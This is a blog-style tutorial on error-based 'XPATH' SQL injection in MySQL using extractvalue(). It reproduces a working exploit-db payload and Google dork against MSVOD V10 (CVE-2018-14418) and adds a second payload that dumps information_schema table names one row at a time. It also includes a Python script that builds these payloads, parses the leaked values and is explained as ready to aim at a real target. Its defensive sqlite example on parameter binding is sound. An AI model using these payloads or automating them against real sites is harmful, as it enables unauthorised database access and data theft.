XPATH SQL Injection Using a Recent Example

Xpath Injection

I'm going to show you a recent example of XPATH injection from exploit-db. This is a common method you'll have to use when the basic UNION SELECT injection doesn't work and neither does a string-based injection: the query's own result never reaches the page, but the database error message does, so the data is smuggled out through the error. Strictly speaking the bug is SQL injection into a MySQL query; the "XPATH" name comes from the error that MySQL's extractvalue() raises when its second argument is not valid XPath, which echoes the offending expression back to you. It's a bit more tedious because the error leaks one value at a time, so you'll have to use LIMIT most of the time.

Fixing Injection

Fixing this kind of injection is relatively simple. According to OWASP:

“Just like SQL injection, in order to protect yourself you must escape single quotes (or double quotes) if your application uses them.”


Here is OWASP's article on XPATH Injection Vulnerability. I highly advise reading it in order to understand how to prevent this from happening on your own site. If you're an aspiring penetration tester, this is important to know as well so you can advise your clients. One caveat: the quoted advice is written for true XPath injection, where user input lands inside an XPath expression. In the MySQL case below, the vulnerable cid parameter is numeric and the payload contains no quotes at all, so escaping quotes would not stop it. The fix there is to validate cid as an integer and pass it to the query as a bound parameter (a prepared statement) instead of concatenating it into the SQL string.
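As an added example (not code from the original post or from the MSVOD code base), here is a minimal sqlite3 model of a numeric cid lookup. It shows why escaping quotes does nothing for a numeric parameter, and what a parameterized, type-checked lookup does instead. The table, its rows and the payload are constructed for illustration; they are not the vendor's schema.

```python
# Added example (not from the original post or the MSVOD code base): a small
# sqlite3 model of a numeric "cid" lookup, showing why escaping quotes does
# not stop the injection shown on this page and what does.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for a site's listing table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE images (id INTEGER, cid INTEGER, name TEXT)")
    conn.executemany(
        "INSERT INTO images VALUES (?, ?, ?)",
        [(1, 13, "public-a"), (2, 13, "public-b"), (3, 99, "hidden")],
    )
    return conn


def list_vulnerable(conn: sqlite3.Connection, cid: str) -> list:
    """Vulnerable form: cid is interpolated into the SQL text.

    There are no quotes around it because it is a number, so quote-escaping
    is irrelevant: a value of "13 ) OR 1=1 --" becomes part of the grammar.
    """
    sql = "SELECT name FROM images WHERE ( cid = %s ) ORDER BY id" % cid
    return sorted(row[0] for row in conn.execute(sql))


def escape_quotes(value: str) -> str:
    """The quoted OWASP advice applied literally: double up quote characters."""
    return value.replace("'", "''").replace('"', '""')


def list_hardened(conn: sqlite3.Connection, cid: str) -> list:
    """Hardened form: check the type, then bind the value as a parameter so
    the driver never lets it become part of the SQL text."""
    cid_int = int(cid)  # raises ValueError for anything that is not an integer
    sql = "SELECT name FROM images WHERE cid = ? ORDER BY id"
    return sorted(row[0] for row in conn.execute(sql, (cid_int,)))


# Constructed numeric-context payload in the same shape as the MSVOD one:
# close the parenthesis, add our own clause, comment out the rest of the query.
PAYLOAD = "13 ) OR 1=1 --"

if __name__ == "__main__":
    db = make_db()
    print(list_vulnerable(db, "13"))
    print(list_vulnerable(db, PAYLOAD))                 # leaks "hidden"
    print(list_vulnerable(db, escape_quotes(PAYLOAD)))  # still leaks it
    print(list_hardened(db, "13"))
    try:
        list_hardened(db, PAYLOAD)
    except ValueError as err:
        print("rejected:", err)
```

The escaped payload is byte-for-byte identical to the raw one because it never contained a quote, which is the whole point: for numeric parameters the only defence is type validation plus parameter binding.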

Example exploit

# Exploit Title: MSVOD V10 - SQL Injection
# Google Dork: inurl:"images/lists?cid=13"
# Date: 2018/07/17
# Exploit Author: Hzllaga
# Vendor Homepage: http://www.msvod.cc/
# Version: MSVOD V10
# CVE : CVE-2018-14418
# Reference : https://www.wtfsec.org/2583/msvod-v10-sql-injection/

Payload: /images/lists?cid=13%20)%20ORDER%20BY%201%20desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version))%20desc%20--%20
You can tell by looking at the payload that this is what exploit-db calls an XPATH injection, for the simple reason that it uses extractvalue(). extractvalue() takes an XML fragment and an XPath expression; when the expression is not valid XPath, MySQL raises an error that quotes the expression back. Wrapping the data you want in concat() with a leading 0x7c (|) or 0x3a (:) guarantees the expression is invalid, so the database name, user and version come back inside the error message even though the query's own result is never displayed.

Here the cid parameter is vulnerable, but if you were to try a UNION-based injection it wouldn't work. There are a few things to try in this scenario, and one of them is extractvalue().

URL-decoded, the actual payload is

/images/lists?cid=13 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,database(),0x7c,user(),0x7c,@@version)) desc --

Note that it contains no quotes: cid is compared as a number, so the payload closes the parenthesis around it, appends a second ORDER BY expression containing extractvalue(), and comments out the rest of the original query. Other than the UNION SELECT being missing there is really no difference from an ordinary injection.

However, in some cases with XPATH injection you will be stuck going one row at a time, which can be very time consuming. The error message carries a single value, and MySQL shows at most 32 characters of it, so instead of a union that returns every row at once you have to page through the results with

LIMIT 0,1, LIMIT 1,1, LIMIT 2,1, etc.

One example payload where you'd have to use this method, pulling one table name from information_schema.tables per request:

?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))--
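The row-at-a-time loop described above, as an added example that is not part of the original post or of any exploit-db entry: it builds the LIMIT n,1 extractvalue() payload for each offset, pulls the leaked value back out of MySQL's "XPATH syntax error" text, and stops when the LIMIT runs past the last row. The parameter name, the helper names and the fake server responses are constructed for the example; the first three information_schema table names are used as sample data only.

```python
# Added example (not from the original post): build the LIMIT-paged
# extractvalue() payloads described above and pull the leaked value out of
# MySQL's XPATH error. The "server" here is a constructed stand-in.
import re
from urllib.parse import quote

XPATH_ERROR = re.compile(r"XPATH syntax error: '([^']*)'")

# MySQL shows at most this many characters of the bad XPath expression in the
# error, which is why one row (and, for long values, one substring) is pulled
# per request instead of a group_concat() of everything at once.
MAX_LEAK = 32


def build_payload(offset: int, marker: str = "0x3a") -> str:
    """Payload for the id parameter: one table name per request.

    offset=0 reproduces the payload shown on the page above.
    """
    inner = (
        "select concat(%s,table_name) from information_schema.tables "
        "limit %d,1" % (marker, offset)
    )
    return "1 and extractvalue(rand(),concat(%s,(%s)))--" % (marker, inner)


def build_url(base: str, offset: int) -> str:
    """URL-encode the payload the way a browser or proxy would send it."""
    return "%s?id=%s" % (base, quote(build_payload(offset), safe="(),=*"))


def extract_leak(body: str):
    """Return the leaked value from a response body, or None if none leaked."""
    match = XPATH_ERROR.search(body)
    if not match:
        return None
    # Drop the marker(s) we prepended: ':' for 0x3a, '|' for 0x7c.
    return match.group(1).lstrip(":|")


def walk_tables(fetch, max_rows: int = 100) -> list:
    """Step LIMIT n,1 upwards until the error no longer carries a value.

    Past the last row the subquery yields NULL, concat() of NULL is NULL, and
    extractvalue() with a NULL XPath returns NULL without raising, so the
    page renders normally and the loop stops.
    """
    names = []
    for offset in range(max_rows):
        leaked = extract_leak(fetch(build_payload(offset)))
        if not leaked:
            break
        names.append(leaked)
    return names


# Constructed sample data and a fake vulnerable page standing in for the
# target: the first three rows of information_schema.tables leak, then the
# LIMIT runs off the end.
SAMPLE_TABLES = ["CHARACTER_SETS", "COLLATIONS", "COLUMNS"]


def fake_fetch(payload: str) -> str:
    """Pretend to be the vulnerable page; echoes MySQL's error format."""
    offset = int(re.search(r"limit (\d+),1", payload).group(1))
    if offset < len(SAMPLE_TABLES):
        # Both concat() markers end up in front of the value, as in the
        # real payload, and MySQL truncates the whole thing to MAX_LEAK.
        value = ("::" + SAMPLE_TABLES[offset])[:MAX_LEAK]
        return "<html><body>XPATH syntax error: '%s'</body></html>" % value
    return "<html><body>normal listing page</body></html>"


if __name__ == "__main__":
    print(build_url("http://example.invalid/page.php", 0))  # constructed host
    for name in walk_tables(fake_fetch):
        print("leaked table:", name)
```

To point this at a real target you would replace fake_fetch with a function that sends the URL from build_url and returns the response body; everything else stays the same. For values longer than 32 characters you would additionally wrap table_name in substr() and page through the string in the same way, which this example does not do.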
Here is a link to a useful tutorial on XPATH injections. The English is a little bad, but if you have any questions don't hesitate to ask them in the comments. This is only to be used for educational or legal purposes. Keep in mind that I take no responsibility for your actions.
